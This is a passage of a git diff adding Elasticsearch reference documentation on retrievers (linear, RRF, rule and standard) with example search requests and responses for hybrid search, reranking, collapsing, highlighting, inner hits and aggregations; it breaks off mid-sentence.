"minmax" + } + ], + "rank_window_size": 10 + } + }, + "_source": false +} +``` + +This returns the following response based on the normalized weighted score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 3.5, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 3.5 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 2.3 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.1 + } + ] + } +} +``` + +:::: + + +By normalizing scores and leveraging `function_score` queries, we can also implement more complex ranking strategies, such as sorting results based on their timestamps, assign the timestamp as a score, and then normalizing this score to [0, 1]. +Then, we can easily combine the above with a `knn` retriever as follows: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "retrievers": [ + { + "retriever": { + "standard": { + "query": { + "function_score": { + "query": { + "term": { + "topic": "ai" + } + }, + "functions": [ + { + "script_score": { + "script": { + "source": "doc['timestamp'].value.millis" + } + } + } + ], + "boost_mode": "replace" + } + }, + "sort": { + "timestamp": { + "order": "asc" + } + } + } + }, + "weight": 2, + "normalizer": "minmax" + }, + { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "weight": 1.5 + } + ], + "rank_window_size": 10 + } + }, + "_source": false +} +``` + +Which would return the following results: + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 4, + "relation": "eq" + }, + "max_score": 3.5, + "hits": [ + { + "_index": "retrievers_example", + "_id": "3", + "_score": 3.5 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 2.0 + }, + { + "_index": "retrievers_example", + "_id": "4", + "_score": 1.1 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.1 + } + ] + } +} +``` + +:::: + + +## Example: RRF with the multi-field query format [retrievers-examples-rrf-multi-field-query-format] +```yaml {applies_to} +stack: ga 9.1 +``` + +There's an even simpler way to execute a hybrid search though: We can use the [multi-field query format](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-query-format), which allows us to query multiple fields without explicitly specifying inner retrievers. + +One of the major challenges with hybrid search is normalizing the scores across matches on all field types. +Scores from [`text`](/reference/elasticsearch/mapping-reference/text.md) and [`semantic_text`](/reference/elasticsearch/mapping-reference/semantic-text.md) fields don't always fall in the same range, so we need to normalize the ranks across matches on these fields to generate a result set. +For example, BM25 scores from `text` fields are unbounded, while vector similarity scores from `text_embedding` models are bounded between [0, 1]. +The multi-field query format [handles this normalization for us automatically](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-grouping). + +The following example uses the multi-field query format to query every field specified in the `index.query.default_field` index setting, which is set to `*` by default. +This default value will cause the retriever to query every field that either: + +- Supports term queries, such as `keyword` and `text` fields +- Is a `semantic_text` field + +In this example, that would translate to the `text`, `text_semantic`, `year`, `topic`, and `timestamp` fields. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "query": "artificial intelligence" + } + } +} +``` + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + +We can also use the `fields` parameter to explicitly specify the fields to query. +The following example uses the multi-field query format to query the `text` and `text_semantic` fields. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "query": "artificial intelligence", + "fields": ["text", "text_semantic"] + } + } +} +``` + +::::{note} +The `fields` parameter also accepts [wildcard field patterns](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-wildcard-field-patterns). +:::: + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + +## Example: Linear retriever with the multi-field query format [retrievers-examples-linear-multi-field-query-format] +```yaml {applies_to} +stack: ga 9.1 +``` + +We can also use the [multi-field query format](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-query-format) with the `linear` retriever. +It works much the same way as [on the `rrf` retriever](#retrievers-examples-rrf-multi-field-query-format), with a couple key differences: + +- We can use `^` notation to specify a [per-field boost](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-boosting) +- We must set the `normalizer` parameter to specify the normalization method used to combine [field group scores](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-grouping) + +The following example uses the `linear` retriever to query the `text`, `text_semantic`, and `topic` fields, with a boost of 2 on the `topic` field: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "query": "artificial intelligence", + "fields": ["text", "text_semantic", "topic^2"], + "normalizer": "minmax" + } + } +} +``` + +This returns the following response based on the normalized score for each result: + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 2.0, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 2.0 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 1.2 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.1 + } + ] + } +} +``` + +:::: + +## Example: Grouping results by year with `collapse` [retrievers-examples-collapsing-retriever-results] + +In our result set, we have many documents with the same `year` value. We can clean this up using the `collapse` parameter with our retriever. This, as with the standard [collapse](/reference/elasticsearch/rest-apis/collapse-search-results.md) feature, +enables grouping results by any field and returns only the highest-scoring document from each group. In this example we’ll collapse our results based on the `year` field. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "collapse": { + "field": "year", + "inner_hits": { + "name": "topic related documents", + "_source": [ + "year" + ] + } + }, + "_source": false +} +``` + +This returns the following response with collapsed results. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "fields": { + "year": [ + 2024 + ] + }, + "inner_hits": { + "topic related documents": { + "hits": { + "total": { + "value": 2, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "_source": { + "year": 2024 + } + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25, + "_source": { + "year": 2024 + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "fields": { + "year": [ + 2023 + ] + }, + "inner_hits": { + "topic related documents": { + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "_source": { + "year": 2023 + } + } + ] + } + } + } + } + ] + } +} +``` + +:::: + + + +## Example: Highlighting results based on nested sub-retrievers [retrievers-examples-highlighting-retriever-results] + +Highlighting is now also available for nested sub-retrievers matches. For example, consider the same `rrf` retriever as above, with a `knn` and `standard` retriever as its sub-retrievers. We can specify a `highlight` section, as defined in the [highlighting](/reference/elasticsearch/rest-apis/highlighting.md) documentation, and compute highlights for the top results. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "highlight": { + "fields": { + "text": { + "fragment_size": 150, + "number_of_fragments": 3 + } + } + }, + "_source": false +} +``` + +This would highlight the `text` field, based on the matches produced by the `standard` retriever. The highlighted snippets would then be included in the response as usual, i.e. under each search hit. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "highlight": { + "text": [ + "Large language models are revolutionizing information retrieval by boosting search precision, deepening contextual understanding, and reshaping user experiences" + ] + } + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "highlight": { + "text": [ + "Artificial intelligence is transforming medicine, from advancing diagnostics and tailoring treatment plans to empowering predictive patient care for improved" + ] + } + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + + +## Example: Computing inner hits from nested sub-retrievers [retrievers-examples-inner-hits-retriever-results] + +We can also define `inner_hits` to be computed on any of the sub-retrievers, and propagate those computations to the top level compound retriever. For example, let’s create a new index with a `knn` field, nested under the `nested_field` field, and index a couple of documents. + +```console +PUT retrievers_example_nested +{ + "settings": { + "number_of_shards": 1 + }, + "mappings": { + "properties": { + "nested_field": { + "type": "nested", + "properties": { + "paragraph_id": { + "type": "keyword" + }, + "nested_vector": { + "type": "dense_vector", + "dims": 3, + "similarity": "l2_norm", + "index": true, + "index_options": { + "type": "flat" + } + } + } + }, + "topic": { + "type": "keyword" + } + } + } +} + +POST /retrievers_example_nested/_doc/1 +{ + "nested_field": [ + { + "paragraph_id": "1a", + "nested_vector": [ + -1.12, + -0.59, + 0.78 + ] + }, + { + "paragraph_id": "1b", + "nested_vector": [ + -0.12, + 1.56, + 0.42 + ] + }, + { + "paragraph_id": "1c", + "nested_vector": [ + 1, + -1, + 0 + ] + } + ], + "topic": [ + "ai" + ] +} + +POST /retrievers_example_nested/_doc/2 +{ + "nested_field": [ + { + "paragraph_id": "2a", + "nested_vector": [ + 0.23, + 1.24, + 0.65 + ] + } + ], + "topic": [ + "information_retrieval" + ] +} + +POST /retrievers_example_nested/_doc/3 +{ + "topic": [ + "ai" + ] +} + +POST /retrievers_example_nested/_refresh +``` + +Now we can run an `rrf` retriever query and also compute [inner hits](/reference/elasticsearch/rest-apis/retrieve-inner-hits.md) for the `nested_field.nested_vector` field, based on the `knn` query specified. + +```console +GET /retrievers_example_nested/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "nested": { + "path": "nested_field", + "inner_hits": { + "name": "nested_vector", + "_source": false, + "fields": [ + "nested_field.paragraph_id" + ] + }, + "query": { + "knn": { + "field": "nested_field.nested_vector", + "query_vector": [ + 1, + 0, + 0.5 + ], + "k": 10 + } + } + } + } + } + }, + { + "standard": { + "query": { + "term": { + "topic": "ai" + } + } + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": [ + "topic" + ] +} +``` + +This would propagate the `inner_hits` defined for the `knn` query to the `rrf` retriever, and compute inner hits for `rrf`'s top results. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 1.0, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "1", + "_score": 1.0, + "_source": { + "topic": [ + "ai" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.44444445, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 2 + }, + "_score": 0.44444445, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1c" + ] + } + ] + } + }, + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 1 + }, + "_score": 0.21301977, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1b" + ] + } + ] + } + }, + { + "_index": "retrievers_example_nested", + "_id": "1", + "_nested": { + "field": "nested_field", + "offset": 0 + }, + "_score": 0.16889325, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "1a" + ] + } + ] + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example_nested", + "_id": "2", + "_score": 0.33333334, + "_source": { + "topic": [ + "information_retrieval" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 0.31715825, + "hits": [ + { + "_index": "retrievers_example_nested", + "_id": "2", + "_nested": { + "field": "nested_field", + "offset": 0 + }, + "_score": 0.31715825, + "fields": { + "nested_field": [ + { + "paragraph_id": [ + "2a" + ] + } + ] + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example_nested", + "_id": "3", + "_score": 0.33333334, + "_source": { + "topic": [ + "ai" + ] + }, + "inner_hits": { + "nested_vector": { + "hits": { + "total": { + "value": 0, + "relation": "eq" + }, + "max_score": null, + "hits": [] + } + } + } + } + ] + } +} +``` + +:::: + + +Note: if using more than one `inner_hits` we need to provide custom names for each `inner_hits` so that they are unique across all retrievers within the request. + + +## Example: Combine RRF with aggregations [retrievers-examples-rrf-and-aggregations] + +Retrievers support both composability and most of the standard `_search` functionality. For instance, we can compute aggregations with the `rrf` retriever. When using a compound retriever, the aggregations are computed based on its nested retrievers. In the following example, the `terms` aggregation for the `topic` field will include all results, not just the top `rank_window_size`, from the 2 nested retrievers, i.e. all documents whose `year` field is greater than 2023, and whose `topic` field matches the term `elastic`. + +```console +GET retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "range": { + "year": { + "gt": 2023 + } + } + } + } + }, + { + "standard": { + "query": { + "term": { + "topic": "elastic" + } + } + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false, + "aggs": { + "topics": { + "terms": { + "field": "topic" + } + } + } +} +``` + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 4, + "relation": "eq" + }, + "max_score": 0.5833334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "5", + "_score": 0.5833334 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.5 + }, + { + "_index": "retrievers_example", + "_id": "4", + "_score": 0.5 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.33333334 + } + ] + }, + "aggregations": { + "topics": { + "doc_count_error_upper_bound": 0, + "sum_other_doc_count": 0, + "buckets": [ + { + "key": "ai", + "doc_count": 3 + }, + { + "key": "elastic", + "doc_count": 2 + }, + { + "key": "assistant", + "doc_count": 1 + }, + { + "key": "documentation", + "doc_count": 1 + }, + { + "key": "information_retrieval", + "doc_count": 1 + }, + { + "key": "llm", + "doc_count": 1 + }, + { + "key": "observability", + "doc_count": 1 + }, + { + "key": "security", + "doc_count": 1 + } + ] + } + } +} +``` + +:::: + + + +## Example: Explainability with multiple retrievers [retrievers-examples-explain-multiple-rrf] + +By adding `explain: true` to the request, each retriever will now provide a detailed explanation of all the steps and calculations required to compute the final score. Composability is fully supported in the context of `explain`, and each retriever will provide its own explanation, as shown in the example below. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "term": { + "topic": "elastic" + } + } + } + }, + { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false, + "size": 1, + "explain": true +} +``` + +The output of which, albeit a bit verbose, will provide all the necessary info to assist in debugging and reason with ranking. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 5, + "relation": "eq" + }, + "max_score": 0.5, + "hits": [ + { + "_shard": "[retrievers_example][0]", + "_node": "jnrdZFKS3abUgWVsVdj2Vg", + "_index": "retrievers_example", + "_id": "1", + "_score": 0.5, + "_explanation": { + "value": 0.5, + "description": "rrf score: [0.5] computed for initial ranks [0, 1] with rankConstant: [1] as sum of [1 / (rank + rankConstant)] for each query", + "details": [ + { + "value": 0.0, + "description": "rrf score: [0], result not found in query at index [0]", + "details": [] + }, + { + "value": 1, + "description": "rrf score: [0.5], for rank [1] in query at index [1] computed as [1 / (1 + 1)], for matching query with score", + "details": [ + { + "value": 0.8333334, + "description": "rrf score: [0.8333334] computed for initial ranks [2, 1] with rankConstant: [1] as sum of [1 / (rank + rankConstant)] for each query", + "details": [ + { + "value": 2, + "description": "rrf score: [0.33333334], for rank [2] in query at index [0] computed as [1 / (2 + 1)], for matching query with score", + "details": [ + { + "value": 2.8129659, + "description": "sum of:", + "details": [ + { + "value": 1.4064829, + "description": "weight(text:information in 0) [PerFieldSimilarity], result of:", + "details": [ + *** + ] + }, + { + "value": 1.4064829, + "description": "weight(text:retrieval in 0) [PerFieldSimilarity], result of:", + "details": [ + *** + ] + } + ] + } + ] + }, + { + "value": 1, + "description": "rrf score: [0.5], for rank [1] in query at index [1] computed as [1 / (1 + 1)], for matching query with score", + "details": [ + { + "value": 1, + "description": "doc [0] with an original score of [1.0] is at rank [1] from the following source queries.", + "details": [ + { + "value": 1.0, + "description": "found vector with calculated similarity: 1.0", + "details": [] + } + ] + } + ] + } + ] + } + ] + } + ] + } + } + ] + } +} +``` + +:::: + + + +## Example: Rerank results of an RRF retriever [retrievers-examples-text-similarity-reranker-on-top-of-rrf] + +To demonstrate the full functionality of retrievers, the following examples also require access to a [semantic reranking model](docs-content://solutions/search/ranking/semantic-reranking.md) set up using the [Elastic inference APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-inference). + +In this example we’ll set up a reranking service and use it with the `text_similarity_reranker` retriever to rerank our top results. + +```console +PUT _inference/rerank/my-rerank-model +{ + "service": "cohere", + "service_settings": { + "model_id": "rerank-english-v3.0", + "api_key": "{{COHERE_API_KEY}}" + } +} +``` + +Let’s start by reranking the results of the `rrf` retriever in our previous example. + +```console +GET retrievers_example/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "What are the state of the art applications of AI in information retrieval?" + } + }, + "_source": false +} +``` + + +## Example: RRF with semantic reranker [retrievers-examples-rrf-ranking-on-text-similarity-reranker-results] + +For this example, we’ll replace the rrf’s `standard` retriever with the `text_similarity_reranker` retriever, using the `my-rerank-model` reranker we previously configured. Since this is a reranker, it needs an initial pool of documents to work with. In this case, we’ll rerank the top `rank_window_size` documents matching the `ai` topic. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + { + "text_similarity_reranker": { + "retriever": { + "standard": { + "query": { + "term": { + "topic": "ai" + } + } + } + }, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "Can I use generative AI to identify user intent and improve search relevance?" + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false +} +``` + + +## Example: Chaining multiple semantic rerankers [retrievers-examples-chaining-text-similarity-reranker-retrievers] + +Full composability means we can chain together multiple retrievers of the same type. For instance, imagine we have a computationally expensive reranker that’s specialized for AI content. We can rerank the results of a `text_similarity_reranker` using another `text_similarity_reranker` retriever. Each reranker can operate on different fields and/or use different inference services. + +```console +GET retrievers_example/_search +{ + "retriever": { + "text_similarity_reranker": { + "retriever": { + "text_similarity_reranker": { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "rank_window_size": 100, + "field": "text", + "inference_id": "my-rerank-model", + "inference_text": "What are the state of the art applications of AI in information retrieval?" + } + }, + "rank_window_size": 10, + "field": "text", + "inference_id": "my-other-more-expensive-rerank-model", + "inference_text": "Applications of Large Language Models in technology and their impact on user satisfaction" + } + }, + "_source": false +} +``` + +Note that our example applies two reranking steps. First, we rerank the top 100 documents from the `knn` search using the `my-rerank-model` reranker. Then we pick the top 10 results and rerank them using the more fine-grained `my-other-more-expensive-rerank-model`. + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md new file mode 100644 index 0000000000000..622f8881cf84f --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md @@ -0,0 +1,149 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# RRF retriever [rrf-retriever] + +An [RRF](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md) retriever returns top documents based on the RRF formula, equally weighting two or more child retrievers. +Reciprocal rank fusion (RRF) is a method for combining multiple result sets with different relevance indicators into a single result set. + + +## Parameters [rrf-retriever-parameters] + +::::{note} +Either `query` or `retrievers` must be specified. +Combining `query` and `retrievers` is not supported. +:::: + +`query` {applies_to}`stack: ga 9.1` +: (Optional, String) + + The query to use when using the [multi-field query format](../retrievers.md#multi-field-query-format). + +`fields` {applies_to}`stack: ga 9.1` +: (Optional, array of strings) + + The fields to query when using the [multi-field query format](../retrievers.md#multi-field-query-format). + If not specified, uses the index's default fields from the `index.query.default_field` index setting, which is `*` by default. + +`retrievers` +: (Optional, array of retriever objects) + + A list of child retrievers to specify which sets of returned top documents will have the RRF formula applied to them. + Each child retriever carries an equal weight as part of the RRF formula. Two or more child retrievers are required. + +`rank_constant` +: (Optional, integer) + + This value determines how much influence documents in individual result sets per query have over the final ranked result set. A higher value indicates that lower ranked documents have more influence. This value must be greater than or equal to `1`. Defaults to `60`. + +`rank_window_size` +: (Optional, integer) + + This value determines the size of the individual result sets per query. + A higher value will improve result relevance at the cost of performance. + The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param). + `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`. + Defaults to 10. + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications. + +## Example: Hybrid search [rrf-retriever-example-hybrid] + +A simple hybrid search example (lexical search + dense vector search) combining a `standard` retriever with a `knn` retriever using RRF: + +```console +GET /restaurants/_search +{ + "retriever": { + "rrf": { <1> + "retrievers": [ <2> + { + "standard": { <3> + "query": { + "multi_match": { + "query": "Austria", + "fields": [ + "city", + "region" + ] + } + } + } + }, + { + "knn": { <4> + "field": "vector", + "query_vector": [10, 22, 77], + "k": 10, + "num_candidates": 10 + } + } + ], + "rank_constant": 1, <5> + "rank_window_size": 50 <6> + } + } +} +``` + +1. Defines a retriever tree with an RRF retriever. +2. The sub-retriever array. +3. The first sub-retriever is a `standard` retriever. +4. The second sub-retriever is a `knn` retriever. +5. The rank constant for the RRF retriever. +6. The rank window size for the RRF retriever. + +## Example: Hybrid search with sparse vectors [rrf-retriever-example-hybrid-sparse] + +A more complex hybrid search example (lexical search + ELSER sparse vector search + dense vector search) using RRF: + +```console +GET movies/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "sparse_vector": { + "field": "plot_embedding", + "inference_id": "my-elser-model", + "query": "films that explore psychological depths" + } + } + } + }, + { + "standard": { + "query": { + "multi_match": { + "query": "crime", + "fields": [ + "plot", + "title" + ] + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [10, 22, 77], + "k": 10, + "num_candidates": 10 + } + } + ] + } + } +} +``` + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md new file mode 100644 index 0000000000000..e9bd4ac78d2cc --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md @@ -0,0 +1,121 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Query rules retriever [rule-retriever] + +The `rule` retriever enables fine-grained control over search results by applying contextual [query rules](/reference/elasticsearch/rest-apis/searching-with-query-rules.md#query-rules) to pin or exclude documents for specific queries. This retriever has similar functionality to the [rule query](/reference/query-languages/query-dsl/query-dsl-rule-query.md), but works out of the box with other retrievers. + +## Prerequisites [_prerequisites_16] + +To use the `rule` retriever you must first create one or more query rulesets using the [query rules management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules). + +## Parameters [rule-retriever-parameters] + +`retriever` +: (Required, `retriever`) + + The child retriever that returns the results to apply query rules on top of. This can be a standalone retriever such as the [standard](standard-retriever.md) or [knn](knn-retriever.md) retriever, or it can be a compound retriever. + + +`ruleset_ids` +: (Required, `array`) + + An array of one or more unique [query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-query_rules) IDs with query-based rules to match and apply as applicable. Rulesets and their associated rules are evaluated in the order in which they are specified in the query and ruleset. The maximum number of rulesets to specify is 10. + + +`match_criteria` +: (Required, `object`) + + Defines the match criteria to apply to rules in the given query ruleset(s). Match criteria should match the keys defined in the `criteria.metadata` field of the rule. + + +`rank_window_size` +: (Optional, `int`) + + The number of top documents to return from the `rule` retriever. Defaults to `10`. + +## Example: Rule retriever [rule-retriever-example] + +This example shows the rule retriever executed without any additional retrievers. It runs the query defined by the `retriever` and applies the rules from `my-ruleset` on top of the returned results. + +```console +GET movies/_search +{ + "retriever": { + "rule": { + "match_criteria": { + "query_string": "harry potter" + }, + "ruleset_ids": [ + "my-ruleset" + ], + "retriever": { + "standard": { + "query": { + "query_string": { + "query": "harry potter" + } + } + } + } + } + } +} +``` + +## Example: Rule retriever combined with RRF [rule-retriever-example-rrf] + +This example shows how to combine the `rule` retriever with other rerank retrievers such as [rrf](rrf-retriever.md) or [text_similarity_reranker](text-similarity-reranker-retriever.md). + +::::{warning} +The `rule` retriever will apply rules to any documents returned from its defined `retriever` or any of its sub-retrievers. This means that for the best results, the `rule` retriever should be the outermost defined retriever. Nesting a `rule` retriever as a sub-retriever under a reranker such as `rrf` or `text_similarity_reranker` may not produce the expected results. + +:::: + + +```console +GET movies/_search +{ + "retriever": { + "rule": { <1> + "match_criteria": { + "query_string": "harry potter" + }, + "ruleset_ids": [ + "my-ruleset" + ], + "retriever": { + "rrf": { <2> + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "sorcerer's stone" + } + } + } + }, + { + "standard": { + "query": { + "query_string": { + "query": "chamber of secrets" + } + } + } + } + ] + } + } + } + } +} +``` + +1. The `rule` retriever is the outermost retriever, applying rules to the search results that were previously reranked using the `rrf` retriever. +2. The `rrf` retriever returns results from all of its sub-retrievers, and the output of the `rrf` retriever is used as input to the `rule` retriever. + diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md new file mode 100644 index 0000000000000..e4c6e4b7554da --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md @@ -0,0 +1,98 @@ +--- +applies_to: + stack: all + serverless: ga +--- +# Standard retriever [standard-retriever] + +A standard retriever returns top documents from a traditional [query](/reference/query-languages/querydsl.md). + + +### Parameters: [standard-retriever-parameters] + +`query` +: (Optional, [query object](/reference/query-languages/querydsl.md)) + + Defines a query to retrieve a set of top documents. + + +`filter` +: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md)) + + Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to this retriever, where all documents must match this query but do not contribute to the score. + + +`search_after` +: (Optional, [search after object](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)) + + Defines a search after object parameter used for pagination. + + +`terminate_after` +: (Optional, integer) Maximum number of documents to collect for each shard. If a query reaches this limit, {{es}} terminates the query early. {{es}} collects documents before sorting. + + ::::{important} + Use with caution. {{es}} applies this parameter to each shard handling the 